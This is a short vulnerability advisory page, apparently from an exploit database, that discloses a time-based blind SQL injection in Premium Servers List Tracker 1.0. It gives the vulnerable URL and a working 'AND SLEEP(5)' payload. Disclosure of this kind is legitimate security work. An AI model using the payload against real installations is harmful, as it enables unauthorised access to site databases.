Premium Servers List Tracker 1.0 SQL Injection

2017.08.04
Credit: Kaan KAMIS
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Exploit Title: Premium Servers List Tracker v1.0 a SQL Injection Date: 02.08.2017 Vendor Homepage: https://codecanyon.net/item/premium-servers-list-tracker/19796599?s_rank=270 Exploit Author: Kaan KAMIS Contact: iletisim[at]k2an[dot]com Website: http://k2an.com Category: Web Application Exploits Overview Premium phpServersList is an advanced servers management tool which allows users to track their own servers and visitors to find out great servers from all over the world. Our product is very flexible and, with a little imagination you can make your own unique servers list website.For example: If you want to make a certain type of servers list ( lets say, Counter Strike ) then you can setup from the admin panel so that users can only add Counter Strike Servers; Or if you want to have diversity in your website you can make it a top list, where everyone can add any type of server to the list. Vulnerable Url: http://localhost/server/1[payload] --- Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: http://localhost/server/1 AND SLEEP(5) ---


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top